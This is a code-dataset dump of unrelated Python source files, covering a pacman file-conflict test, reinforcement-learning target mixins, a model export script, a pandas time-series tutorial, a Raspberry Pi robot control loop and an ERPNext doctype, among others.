[ "Unlicense" ]
11
2021-05-21T12:08:44.000Z
2021-12-21T08:30:08.000Z
source/pacman-6.0.1/test/pacman/tests/fileconflict006.py
Scottx86-64/dotfiles-1
51004b1e2b032664cce6b553d2052757c286087d
[ "Unlicense" ]
1
2021-09-26T08:44:40.000Z
2021-09-26T08:44:40.000Z
self.description = "dir->symlink change during package upgrade (conflict)" p1 = pmpkg("pkg1", "1.0-1") p1.files = ["test/", "test/file1", "test/dir/file1", "test/dir/file2"] self.addpkg2db("local", p1) p2 = pmpkg("pkg2") p2.files = ["test/dir/file3"] self.addpkg2db("local", p2) p3 = pmpkg("pkg1", "2.0-1") p3.files = ["test2/", "test2/file3", "test -> test2"] self.addpkg2db("sync", p3) self.args = "-S pkg1" self.addrule("PACMAN_RETCODE=1") self.addrule("PKG_EXIST=pkg1") self.addrule("PKG_VERSION=pkg1|1.0-1")
23.12
74
0.593426
733484cdfca22c03540f2693d3d1f87f9af290b4
4,479
py
Python
shinrl/solvers/discrete_vi/_target_mixin.py
omron-sinicx/ShinRL
09f4ae274a33d1fc1d9d542f816aef40014af6b5
[ "MIT" ]
34
2021-12-09T07:12:57.000Z
2022-03-11T08:17:20.000Z
shinrl/solvers/discrete_vi/_target_mixin.py
omron-sinicx/ShinRL
09f4ae274a33d1fc1d9d542f816aef40014af6b5
[ "MIT" ]
null
null
null
shinrl/solvers/discrete_vi/_target_mixin.py
omron-sinicx/ShinRL
09f4ae274a33d1fc1d9d542f816aef40014af6b5
[ "MIT" ]
4
2021-12-11T07:48:01.000Z
2022-03-01T23:50:33.000Z
"""MixIns to compute the target value of VI-based algorithms. Author: Toshinori Kitamura Affiliation: NAIST & OSX """ from chex import Array import shinrl as srl class TargetMixIn: def target_tabular_dp(self, data: srl.DataDict) -> Array: raise NotImplementedError def target_tabular_rl(self, data: srl.DataDict, samples: srl.Sample) -> Array: raise NotImplementedError def target_deep_dp(self, data: srl.DataDict) -> Array: raise NotImplementedError def target_deep_rl(self, data: srl.DataDict, samples: srl.Sample) -> Array: raise NotImplementedError class QTargetMixIn(TargetMixIn): """MixIn to compute the vanilla Q target.""" def target_tabular_dp(self, data: srl.DataDict) -> Array: return srl.optimal_backup_dp( data["Q"], self.env.mdp.rew_mat, self.env.mdp.tran_mat, self.config.discount, ) def target_tabular_rl(self, data: srl.DataDict, samples: srl.Sample) -> Array: return srl.optimal_backup_rl( data["Q"][samples.next_state.squeeze(axis=1)], # BxA samples.rew, samples.done, self.config.discount, ) def target_deep_dp(self, data: srl.DataDict) -> Array: return srl.optimal_backup_dp( self.q_net.apply(data["QNetTargParams"], self.env.mdp.obs_mat), self.env.mdp.rew_mat, self.env.mdp.tran_mat, self.config.discount, ) def target_deep_rl(self, data: srl.DataDict, samples: srl.Sample) -> Array: return srl.optimal_backup_rl( self.q_net.apply(data["QNetTargParams"], samples.next_obs), samples.rew, samples.done, self.config.discount, ) class DoubleQTargetMixIn(TargetMixIn): """MixIn to compute the Double Q target. Paper: https://arxiv.org/abs/1509.06461 """ def target_deep_dp(self, data: srl.DataDict) -> Array: return srl.double_backup_dp( self.q_net.apply(data["QNetTargParams"], self.env.mdp.obs_mat), self.q_net.apply(data["QNetParams"], self.env.mdp.obs_mat), self.env.mdp.rew_mat, self.env.mdp.tran_mat, self.config.discount, ) def target_deep_rl(self, data: srl.DataDict, samples: srl.Sample) -> Array: return srl.double_backup_rl( self.q_net.apply(data["QNetTargParams"], samples.next_obs), self.q_net.apply(data["QNetParams"], samples.next_obs), samples.rew, samples.done, self.config.discount, ) class MunchausenTargetMixIn(TargetMixIn): """MixIn to compute the Munchausen Q target. Paper: https://arxiv.org/abs/2007.14430 """ def target_tabular_dp(self, data: srl.DataDict) -> Array: return srl.munchausen_backup_dp( data["Q"], self.env.mdp.rew_mat, self.env.mdp.tran_mat, self.config.discount, self.config.kl_coef, self.config.er_coef, self.config.logp_clip, ) def target_tabular_rl(self, data: srl.DataDict, samples: srl.Sample) -> Array: return srl.munchausen_backup_rl( data["Q"][samples.next_state.squeeze(axis=1)], # BxA data["Q"][samples.state.squeeze(axis=1)], # BxA samples.rew, samples.done, samples.act, self.config.discount, self.config.kl_coef, self.config.er_coef, self.config.logp_clip, ) def target_deep_dp(self, data: srl.DataDict) -> Array: return srl.munchausen_backup_dp( self.q_net.apply(data["QNetTargParams"], self.env.mdp.obs_mat), self.env.mdp.rew_mat, self.env.mdp.tran_mat, self.config.discount, self.config.kl_coef, self.config.er_coef, self.config.logp_clip, ) def target_deep_rl(self, data: srl.DataDict, samples: srl.Sample) -> Array: return srl.munchausen_backup_rl( self.q_net.apply(data["QNetTargParams"], samples.next_obs), # BxA self.q_net.apply(data["QNetTargParams"], samples.obs), # BxA samples.rew, samples.done, samples.act, self.config.discount, self.config.kl_coef, self.config.er_coef, self.config.logp_clip, )
32.933824
82
0.602367
7df6f040321310b7773154fbaea2f2f2ac5edd00
2,038
py
Python
official/cv/xception/export.py
leelige/mindspore
5199e05ba3888963473f2b07da3f7bca5b9ef6dc
[ "Apache-2.0" ]
77
2021-10-15T08:32:37.000Z
2022-03-30T13:09:11.000Z
official/cv/xception/export.py
leelige/mindspore
5199e05ba3888963473f2b07da3f7bca5b9ef6dc
[ "Apache-2.0" ]
3
2021-10-30T14:44:57.000Z
2022-02-14T06:57:57.000Z
official/cv/xception/export.py
leelige/mindspore
5199e05ba3888963473f2b07da3f7bca5b9ef6dc
[ "Apache-2.0" ]
24
2021-10-15T08:32:45.000Z
2022-03-24T18:45:20.000Z
# Copyright 2020 Huawei Technologies Co., Ltd # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ============================================================================ """eval Xception.""" import os import numpy as np from mindspore import Tensor, context, load_checkpoint, load_param_into_net, export from src.Xception import xception from src.model_utils.config import config as args, config_gpu, config_ascend from src.model_utils.moxing_adapter import moxing_wrapper def modelarts_pre_process(): '''modelarts pre process function.''' args.ckpt_file = os.path.join(os.path.dirname(os.path.abspath(__file__)), args.ckpt_file) args.file_name = os.path.join(args.output_path, args.file_name) @moxing_wrapper(pre_process=modelarts_pre_process) def run_export(): '''export function''' if args.device_target == "Ascend": config = config_ascend elif args.device_target == "GPU": config = config_gpu else: raise ValueError("Unsupported device_target.") context.set_context(mode=context.GRAPH_MODE, device_target=args.device_target) context.set_context(device_id=args.device_id) net = xception(class_num=config.class_num) # load checkpoint param_dict = load_checkpoint(args.ckpt_file) load_param_into_net(net, param_dict) net.set_train(False) image = Tensor(np.zeros([args.batch_size, 3, args.height, args.width], np.float32)) export(net, image, file_name=args.file_name, file_format=args.file_format) if __name__ == "__main__": run_export()
35.754386
93
0.722767
b40e21f394f4b34daf2d5543856ad12c0a26c351
441
py
Python
examples/08 langDict/LangBot.py
Killerhaschen/marvin-telegram-bot
c65e890a00450ed6ed4312d93e259db0c080ef6d
[ "MIT" ]
1
2020-01-16T08:40:00.000Z
2020-01-16T08:40:00.000Z
examples/08 langDict/LangBot.py
Killerhaschen/marvin-telegram-bot
c65e890a00450ed6ed4312d93e259db0c080ef6d
[ "MIT" ]
null
null
null
examples/08 langDict/LangBot.py
Killerhaschen/marvin-telegram-bot
c65e890a00450ed6ed4312d93e259db0c080ef6d
[ "MIT" ]
1
2019-10-16T08:11:51.000Z
2019-10-16T08:11:51.000Z
import asyncio from samt import Bot, Answer, Context, Mode marv = Bot() @marv.default_answer def default(): return 'unknown', Context.get('message').text @marv.answer("/start") async def start(): return Answer('greeting', Context.get('user')) @marv.answer("Guten Tag") def guten_tag(): a = Answer('greeting', Context.get('user')) a.language_feature = False return a if __name__ == "__main__": marv.listen()
16.333333
50
0.666667
5ef3604f75bc55c135004958ca8e50533ed54c4d
5,428
py
Python
IdeaProjects/PandasProj/PandasCourse5.py
sinomiko/project
00fadb0033645f103692f5b06c861939a9d4aa0e
[ "BSD-3-Clause" ]
1
2018-12-30T14:07:42.000Z
2018-12-30T14:07:42.000Z
IdeaProjects/PandasProj/PandasCourse5.py
sinomiko/project
00fadb0033645f103692f5b06c861939a9d4aa0e
[ "BSD-3-Clause" ]
null
null
null
IdeaProjects/PandasProj/PandasCourse5.py
sinomiko/project
00fadb0033645f103692f5b06c861939a9d4aa0e
[ "BSD-3-Clause" ]
null
null
null
# encoding: utf-8 import pandas as pd import numpy as np # 1.2 实验知识点 # # 时间戳 Timestamp # 时间索引 DatetimeIndex # 时间转换 to_datatime # 时间序列检索 # 时间序列计算 # 二、时间序列分析介绍 # # 2.1 简介 # # 时间序列(英语:time series)是实证经济学的一种统计方法,它是采用时间排序的一组随机变量,国内生产毛额(GDP)、消费者物价指数(CPI)、股价指数、利率、汇率等等都是时间序列。时间序列的时间间隔可以是分秒(如高频金融数据),可以是日、周、月、季度、年、甚至更大的时间单位。[维基百科] # # 我们针对时间序列数据进行挖掘的过程又被成为时间序列分析,简称:时序分析。 # # 2.2 常见问题 # # Pandas 经常被用于处理与时间序列相关的数据,尤其是像财务数据。在处理时间序列数据时,会遇到各类需求,包括但不限于: # # 生成固定跨度的时期构成时间序列。 # 将现有的时间序列,转换成需要的时间序列格式。 # 计算序列中的相对时间,例如:每季度的第一周。 # 三、Pandas 处理时间序列 # # 接下来,我们就时间序列中常遇到的一些需求类型,列举一些示例,并使用 Pandas 提供的方法进行处理。 # # 3.1 时间戳 Timestamp # # 既然是时间序列类型的数据,那么就少不了时间戳这一关键元素。Pandas 中,我们有两个创建时间戳的方法,分别是:to_datatime和 Timestamp。 # # to_datatime 后面集中详说。首先看一看 Timestamp,它针对于单一标量,举个例子: print pd.Timestamp('2017-10-01') # 如果要包含小时:分钟:秒: print pd.Timestamp('2017-10-01 13:30:59') # 当然,还支持其他的格式输入,比如: print pd.Timestamp('1/10/2017 13:30:59') # 3.2 时间索引 DatetimeIndex # # 在实际工作中,我们很少遇到用单个时间戳的情况。而大多数时候,是使用由时间戳构成的时间索引。 # # 首先,我们来看一下如何使用 Pandas 创建时间索引。这里用到的方法为 date_range(),date_range() 和 python 自带的 range() 很相似。它可以用来创建一系列等间距时间,并作为 Series 或者 DataFrame 的索引。 # # date_range() 方法带有的默认参数如下: ''' pandas.date_range(start=None, end=None, periods=None, freq=’D’, tz=None, normalize=False, name=None, closed=None, **kwargs) ''' # 常用参数的含义如下: # # start= :设置起始时间 # end=:设置截至时间 # periods= :设置时间区间,若 None 则需要设置单独设置起止和截至时间。 # freq= :设置间隔周期,默认为 D,也就是天。可以设置为小时、分钟、秒等。 # tz=:设置时区。 # 举个例子: rng1 = pd.date_range('1/10/2017', periods=24, freq='H') print rng1 # 可以这样: rng2 = pd.date_range('1/10/2017', periods=10, freq='D') print rng2 # 我们可以发现 freq= 参数的特点: # # freq='s': 秒 # freq='min' : 分钟 # freq='H': 小时 # freq='D': 天 # freq='w': 周 # freq='m': 月 # 除了上面这些参数值,还有一些特别的: # # freq='BM': 每个月最后一天 # freq='W':每周的星期日 # 如果你想同时按天、小时更新,也是可以的。但需要像下面这样设置参数值: rng3 = pd.date_range('1/10/2017', periods=20, freq='1H20min') print rng3 # 所以,只要适当地组合,你可以生成任意想要的时间序列索引。 # # 3.3 时间转换 to_datatime # # to_datatime 是 Pandas 用于处理时间序列时的一个重要方法,它可以将实参转换为时间戳。to_datatime 包含的默认参数如下: ''' pandas.to_datetime(arg, errors='raise', dayfirst=False, yearfirst=False, utc=None, box=True, format=None, exact=True, unit=None, infer_datetime_format=False, origin='unix') arg:可以接受整数、浮点数、字符串、时间、列表、元组、一维数组、Series 等。 errors=:默认为 raise,表示遇到无法解析数据将会报错。还可以设置为 coerce,表示无法解析设为 NaT,或者设为 ignore 忽略错误。 dayfirst= :表示首先解析日期,例如:1/10/17 被解析为 2017-10-1。 yearfirst= :表示首先解析年,例如:1/10/17 被解析为 2001-10-17。 utc=:返回 UTC 格式时间索引。 box=:True 表示返回时间索引 DatatimeIndex,False 表示返回多维数组 ndarray。 format= :时间解析格式,例如:%d /%m /%Y。 对于 to_datatime 的返回值而言: 输入列表,默认返回时间索引 DatetimeIndex。 输入 Series,默认返回 datetime64 的 Series。 输入标量,默认返回时间戳 Timestamp。 下面,针对输入数据类型的不同,我们来看一看 to_datatime 的不同用法。 ''' # 3.3.1 输入标量 print pd.to_datetime('1/10/2017 10:00', dayfirst=True) # 3.3.2 输入列表 print pd.to_datetime(['1/10/2017 10:00','2/10/2017 11:00','3/10/2017 12:00']) # 3.3.2 输入 Series print pd.to_datetime(pd.Series(['Oct 11, 2017', '2017-10-2', '3/10/2017']), dayfirst=True) # 3.3.2 输入 DataFrame print pd.to_datetime(pd.DataFrame({'year': [2017, 2018], 'month': [9, 10], 'day': [1, 2], 'hour': [11, 12]})) # 3.3.2 errors= # # 接下来,看一看 errors= 遇到无法解析的数据时,所对应的不同返回值。这个参数对于我们解析大量数据时非常有用。 # print pd.to_datetime(['2017/10/1', 'abc'], errors='raise') print pd.to_datetime(['2017/10/1', 'abc'], errors='ignore') print pd.to_datetime(['2017/10/1', 'abc'], errors='coerce') # 3.4 时间序列检索 # # 上面,我们介绍了时间索引 DatetimeIndex 的生成方法。那么,它主要是用来做什么呢? # # 答案当然是 Pandas 对象的索引啦。将时间变成索引的优点非常多,包含但不限于: # # 查找和检索特定日期的字段非常快。 # 进行数据对齐时,拥有相同时间间隔的索引的数据将会非常快。 # 可以很方便地通过 shift 和 ishift 方法快速移动对象。 # 下面,针对时间序列索引的检索等操作举几个例子。首先,我们生成 10 万条数据: ts = pd.DataFrame(np.random.randn(100000,1), columns=['Value'], index=pd.date_range('20170101', periods=100000, freq='T')) print ts # 当我们对数据进行快速检索是,其实和除了 Series 和 DataFrame 数据别无二致。例如: # # 检索 2017 年 3 月 2 号的数据: print ts['2017-3-2'] # 检索 2017 年 3 月 3 号下午 2 点到 5 点 23 分之间的数据: print ts['2017-3-2 14:00:00':'2017-3-2 17:23:00'] # 总之,一切在 Series 和 DataFrame 上可以用的数据选择与定位的方法,像 iloc(), loc() 等均可以用于时间序列,这里就不再赘述了。 # # 3.5 时间序列计算 # # 在 Pandas 中,包含有很多可以被加入到时间序列计算中去的类,这些被称为 Offsets 对象。 # # 关于这一点,我们举出几个例子就一目了然了。例如: from pandas.tseries import offsets # 载入 offsets dt = pd.Timestamp('2017-10-1 10:59:59') print dt + offsets.DateOffset(months=1, days=2, hour=3) # 增加时间 # 又或者我们减去 3 个周的时间: dt - offsets.Week(3) # 3.6 其他方法 # # 最后,再介绍几个与时间序列处理相关的方法。 # # 移动 Shifting # # shifting 可以将数据或者时间索引沿着时间轴的方向前移或后移,举例如下: # 生成一个时间系列数据集 ts = pd.DataFrame(np.random.randn(7,2), columns=['Value1','Value2' ], index=pd.date_range('20170101', periods=7, freq='T')) # 接下来开始移动。 print ts.shift(3) # 默认是数据向后移动。这里数据值向后移动了 3 行。 print ts.shift(-3) # 可以通过添加负号,使得向前移动。 # 那么,想移动索引怎么办?这里使用 tshift()。 print ts.tshift(3) # 向前移动索引就不再演示了,同样可以通过负号完成。除此之外,shift() 是可以接受一些参数的,比如 freq=''。而这里的 freq='' 参数和上文在介绍 时间索引 DatetimeIndex 时提到的一致。 # # 举个例子: print ts.shift(3, freq='D') # 日期向后移动 3 天 # 所以说,shifting 可以让我们更加灵活地去操作时间序列数据集,完成数据对齐等目标。 # # 重采样 Resample # # 重采样,即是将书剑序列从一个频率转换到另一个频率的过程。实施重采样的情形如下: # # 有时候,我们的时间序列数据集非常大,比如百万级别甚至更高。如果将全部数据用于后序计算,其实很多情况下是没有必要的。此时,我们可以对原有的时间序列进行降频采样。 # 除了上面的情形,重采样还可以被用于数据对齐。比如,两个数据集,但是时间索引的频率不一致,这时候,可以通过重采样使二者频率一致,方便数据合并、计算等操作。 # 下面,我们看一看 resample() 的使用。首先,还是生成一个数据集。 # 生成一个时间系列数据集 ts = pd.DataFrame(np.random.randn(50,1), columns=['Value' ], index=pd.date_range('2017-01', periods=50, freq='D')) print ts # 首先,可以升频采样,间隔变成小时。但是,由于间隔变小,我们就必须对新增加的行进行填充。 ts.resample('H').ffill() print ts # 下面,接着开始降频采样,从 1 天变成 5 天: ts.resample('5D').sum() print ts
24.232143
172
0.718312
6f568ef4980832456ce6c631d796eccf3dbb92df
1,365
py
Python
packages/watchmen-model/src/watchmen_model/system/data_source.py
Indexical-Metrics-Measure-Advisory/watchmen
c54ec54d9f91034a38e51fd339ba66453d2c7a6d
[ "MIT" ]
null
null
null
packages/watchmen-model/src/watchmen_model/system/data_source.py
Indexical-Metrics-Measure-Advisory/watchmen
c54ec54d9f91034a38e51fd339ba66453d2c7a6d
[ "MIT" ]
null
null
null
packages/watchmen-model/src/watchmen_model/system/data_source.py
Indexical-Metrics-Measure-Advisory/watchmen
c54ec54d9f91034a38e51fd339ba66453d2c7a6d
[ "MIT" ]
null
null
null
from enum import Enum from typing import List, Optional, Union from pydantic import BaseModel from watchmen_model.common import DataModel, DataSourceId, OptimisticLock, TenantBasedTuple from watchmen_utilities import ArrayHelper class DataSourceParam(DataModel, BaseModel): name: str = None value: str = None class DataSourceType(str, Enum): MYSQL = 'mysql', ORACLE = 'oracle', MONGODB = 'mongodb', MSSQL = 'mssql' POSTGRESQL = 'postgresql' def construct_param(param: Optional[Union[dict, DataSourceParam]]) -> Optional[DataSourceParam]: if param is None: return None elif isinstance(param, DataSourceParam): return param else: return DataSourceParam(**param) def construct_params(params: Optional[list] = None) -> Optional[List[DataSourceParam]]: if params is None: return None else: return ArrayHelper(params).map(lambda x: construct_param(x)).to_list() class DataSource(TenantBasedTuple, OptimisticLock, BaseModel): dataSourceId: DataSourceId = None dataSourceCode: str = None dataSourceType: DataSourceType = None host: str = None port: str = None username: str = None password: str = None name: str = None url: str = None params: List[DataSourceParam] = [] def __setattr__(self, name, value): if name == 'params': super().__setattr__(name, construct_params(value)) else: super().__setattr__(name, value)
24.375
96
0.747985
6f6176605e1cf42838a610e1b32a84c5323efe5f
1,479
py
Python
covidash/data/preprocessing.py
CRitter93/covidash
9daaa8e17c2487068bfd7a7b581880ee6698cedd
[ "Apache-2.0" ]
1
2020-05-11T17:54:58.000Z
2020-05-11T17:54:58.000Z
covidash/data/preprocessing.py
CRitter93/covidash
9daaa8e17c2487068bfd7a7b581880ee6698cedd
[ "Apache-2.0" ]
null
null
null
covidash/data/preprocessing.py
CRitter93/covidash
9daaa8e17c2487068bfd7a7b581880ee6698cedd
[ "Apache-2.0" ]
null
null
null
import pandas as pd import json import numpy as np import pprint # from shapely.geometry import Polygon, Point import geopandas as gpd from tqdm import tqdm def read_json_data(json_file): with open(json_file) as json_file: json_data = json.load(json_file) return json_data def merge_hopital_with_state_info(): file_name = "../../data/processed/osm_hospital_locations_germany_with_States.geojson" if not Path(file_name).is_file(): gdf_states = gpd.read_file("../../data/raw/bundeslaender_grenzen_2019.geojson") gdf_hospitals = gpd.read_file("../../data/raw/osm_hospital_locations_germany.json").drop([166, 284, 285, 291]) hospital_state_map = {} for idx, coord in gdf_hospitals.iterrows(): for _idx, _row in gdf_states.iterrows(): if coord['geometry'].within(_row.geometry): hospital_state_map[idx] = _row.LAN_GEN gdf_hospitals['hospital_index'] = gdf_hospitals.index.tolist() def hosp_index_to_state(state_map, item_idx): try: state_name = state_map[item_idx] return state_name except KeyError: return np.nan gdf_hospitals['state_name'] = gdf_hospitals.hospital_index.apply( lambda row: hosp_index_to_state(hospital_state_map, row)) gdf_hospitals.to_file("../../data/processed/osm_hospital_locations_germany_with_States.geojson",driver='GeoJSON')
33.613636
121
0.678161
d28f383b3b641be6fe37ff39d7878d795e95a3d2
1,651
py
Python
rawio/grouping/timestamp.py
hdkai/Raw-IO
f0fa928d7ef59a363c6f4c876d642af6dede6ae4
[ "Apache-2.0" ]
null
null
null
rawio/grouping/timestamp.py
hdkai/Raw-IO
f0fa928d7ef59a363c6f4c876d642af6dede6ae4
[ "Apache-2.0" ]
null
null
null
rawio/grouping/timestamp.py
hdkai/Raw-IO
f0fa928d7ef59a363c6f4c876d642af6dede6ae4
[ "Apache-2.0" ]
null
null
null
# # RawIO # Copyright (c) 2021 Yusuf Olokoba. # from dateutil.parser import parse as parse_datetime from PIL import Image from typing import Callable def timestamp_similarity (max_delta_time: float=6.) -> Callable[[str, str], bool]: """ Create a similarity function which uses temporal proximity as a proxy measure. Parameters: max_delta_time (float): Maximum exposure time difference for images to be considered similar, in seconds. Returns: callable: Pairwise image similarity function returning a boolean. """ def similarity_fn (path_a: str, path_b: str) -> bool: # Load images image_a = Image.open(path_a) image_b = Image.open(path_b) # Check sizes if image_a.size != image_b.size: return False # Check timestamps timestamp_a = exposure_timestamp(image_a) timestamp_b = exposure_timestamp(image_b) delta_time = abs(timestamp_a - timestamp_b) return timestamp_a > 0 and timestamp_b > 0 and delta_time <= max_delta_time return similarity_fn def exposure_timestamp (image: Image.Image) -> float: """ Get the exposure timestamp from its EXIF metadata. If the required EXIF dictionary or tag is not present, `-1` will be returned. Parameters: image (PIL.Image): Exposure. Returns: float: Image timestamp. """ DATETIME_ORIGINAL = 36867 timestamp = image.getexif().get(DATETIME_ORIGINAL) if timestamp: timestamp = str(timestamp) datetime = parse_datetime(timestamp) return datetime.timestamp() else: return -1
31.150943
113
0.667474
815caa00acc103b5561bd58e974267e4156adda5
5,387
py
Python
MA/Robot_V002b.py
mirrorcoloured/slcypi
c47975b3523f770d12a521c82e2dfca181e3f35b
[ "MIT" ]
null
null
null
MA/Robot_V002b.py
mirrorcoloured/slcypi
c47975b3523f770d12a521c82e2dfca181e3f35b
[ "MIT" ]
null
null
null
MA/Robot_V002b.py
mirrorcoloured/slcypi
c47975b3523f770d12a521c82e2dfca181e3f35b
[ "MIT" ]
null
null
null
#!/usr/bin/python import sys sys.path.append("/home/pi/Documents/Robots/slcypi/MA") ### ADD PATH sys.path.append("/home/pi/Documents/Robots/slcypi/HAT_Python3") ### ADD PATH import time from time import sleep import atexit import pygame import pygame.camera from PIL import Image #from pylab import * from Tank import Tank from ImageAnalysis import ImageAnalysis # Settings WIDTH = 320 HEIGHT = 240 # Pygame and camera initialize pygame.init() pygame.display.set_caption('My Robot') pygame.camera.init() screen = pygame.display.set_mode((WIDTH,HEIGHT),0) cam_list = pygame.camera.list_cameras() cam = pygame.camera.Camera(cam_list[0],(WIDTH,HEIGHT)) cam.start() robot = Tank() robot.correctDirections(False,False,True) IA = ImageAnalysis() followLine = False try: print('starting loop') done = False while not done: # Camera #sleep(5) # Sleep such that camera will get current image image1 = cam.get_image() #image1 = pygame.transform.scale(image1,(640,480)) #image1 = pygame.transform.flip(image1,1,1) screen.blit(image1,(0,0)) pygame.display.update() # User events for event in pygame.event.get(): if event.type == pygame.KEYDOWN: if event.key == (pygame.K_UP): robot.driveSync(1) if event.key == (pygame.K_DOWN): robot.driveSync(-1) if (event.key == pygame.K_ESCAPE): done = True if (event.key == pygame.K_LEFT): robot.rotateSync(1,45) if (event.key == pygame.K_RIGHT): robot.rotateSync(-1,45) if (event.key == pygame.K_q): followLine = True #robot.driveSync(1,50) #sleep(1) #robot.driveSync(1,40) if (event.key == pygame.K_w): followLine = False robot.driveSync(0) robot.rotateSync(0) if (event.key == pygame.K_s): # Set target rgb = IA.setTarget(image1,WIDTH,HEIGHT) image1.fill(rgb) screen.blit(image1,(0,0)) pygame.display.update() sleep(5) if (event.key ==pygame.K_r): # Analyze image1 = IA.convertRainbow(image1,WIDTH,HEIGHT) screen.blit(image1,(0,0)) pygame.display.update() sleep(5) if (event.key ==pygame.K_a): # Analyze image1 = IA.convertTrueFalse(image1,WIDTH,HEIGHT) screen.blit(image1,(0,0)) pygame.display.update() sleep(5) if (event.key==pygame.K_c): pos = IA.getLinePosition(image1,WIDTH,HEIGHT) print(pos) if event.type == pygame.KEYUP: if event.key == (pygame.K_UP): robot.driveSync(0) if event.key == (pygame.K_DOWN): robot.driveSync(0) if (event.key == pygame.K_LEFT): robot.rotateSync(0) if (event.key == pygame.K_RIGHT): robot.rotateSync(0) if followLine == True: pos = IA.getLinePosition(image1,WIDTH,HEIGHT) print(pos) if abs(pos) >0.5: if pos > 0: robot.rotateSync(-1) sleep(0.01) robot.rotateSync(0) else: robot.rotateSync(1) sleep(0.01) robot.rotateSync(0) else: robot.driveSync(1) sleep(0.01) robot.driveSync(0) except KeyboardInterrupt: pygame.quit() robot.stop() cam.stop() pygame.quit()
41.75969
101
0.374234
6f9c5de3ca64f08169d537485009741bbe8b12c3
1,623
py
Python
frappe-bench/apps/erpnext/erpnext/stock/doctype/item_alternative/item_alternative.py
Semicheche/foa_frappe_docker
a186b65d5e807dd4caf049e8aeb3620a799c1225
[ "MIT" ]
null
null
null
frappe-bench/apps/erpnext/erpnext/stock/doctype/item_alternative/item_alternative.py
Semicheche/foa_frappe_docker
a186b65d5e807dd4caf049e8aeb3620a799c1225
[ "MIT" ]
null
null
null
frappe-bench/apps/erpnext/erpnext/stock/doctype/item_alternative/item_alternative.py
Semicheche/foa_frappe_docker
a186b65d5e807dd4caf049e8aeb3620a799c1225
[ "MIT" ]
null
null
null
# -*- coding: utf-8 -*- # Copyright (c) 2018, Frappe Technologies Pvt. Ltd. and contributors # For license information, please see license.txt from __future__ import unicode_literals import frappe from frappe import _ from frappe.model.document import Document class ItemAlternative(Document): def validate(self): self.has_alternative_item() self.validate_alternative_item() self.validate_duplicate() def has_alternative_item(self): if (self.item_code and not frappe.db.get_value('Item', self.item_code, 'allow_alternative_item')): frappe.throw(_("Not allow to set alternative item for the item {0}").format(self.item_code)) def validate_alternative_item(self): if self.item_code == self.alternative_item_code: frappe.throw(_("Alternative item must not be same as item code")) def validate_duplicate(self): if frappe.db.get_value("Item Alternative", {'item_code': self.item_code, 'alternative_item_code': self.alternative_item_code, 'name': ('!=', self.name)}): frappe.throw(_("Already record exists for the item {0}".format(self.item_code))) def get_alternative_items(doctype, txt, searchfield, start, page_len, filters): return frappe.db.sql(""" (select alternative_item_code from `tabItem Alternative` where item_code = %(item_code)s and alternative_item_code like %(txt)s) union (select item_code from `tabItem Alternative` where alternative_item_code = %(item_code)s and item_code like %(txt)s and two_way = 1) limit {0}, {1} """.format(start, page_len), { "item_code": frappe.db.escape(filters.get('item_code')), "txt": "%%%s%%" % frappe.db.escape(txt) })
40.575
95
0.741836
6fad16cee289abdaf9a983e71d23f92f5203a4e3
772
py
Python
main.py
jakoubek/Technotes
7748d20100706e408e1d89c841098f987d0e1492
[ "MIT" ]
null
null
null
main.py
jakoubek/Technotes
7748d20100706e408e1d89c841098f987d0e1492
[ "MIT" ]
3
2022-03-27T08:37:43.000Z
2022-03-30T15:23:46.000Z
main.py
jakoubek/Technotes
7748d20100706e408e1d89c841098f987d0e1492
[ "MIT" ]
null
null
null
def define_env(env): "Definition of the module" @env.macro def feedback(title, section, slug): email_address = f"{section}+{slug}@technotes.jakoubek.net" md = "\n\n## Feedback / Kontakt\n\n" md += f"Wenn Sie Fragen oder Anregungen zum Artikel *{title}* haben, senden Sie mir bitte eine E-Mail an: [{email_address}](mailto:{email_address}?subject=[Technotes] {title})" return md # def on_post_page_macros(env): # env.raw_markdown += "{{ feedback(page.meta.title, page.meta.section, page.meta.slug) }}" # env.raw_markdown += '\n\n## Feedback / Kontakt\n\n' # env.raw_markdown += 'Wenn Sie Fragen oder Anregungen zum Artikel *' + \ # env.page.title + '* haben ...' # env.raw_markdown += env.page.abs_url
42.888889
184
0.643782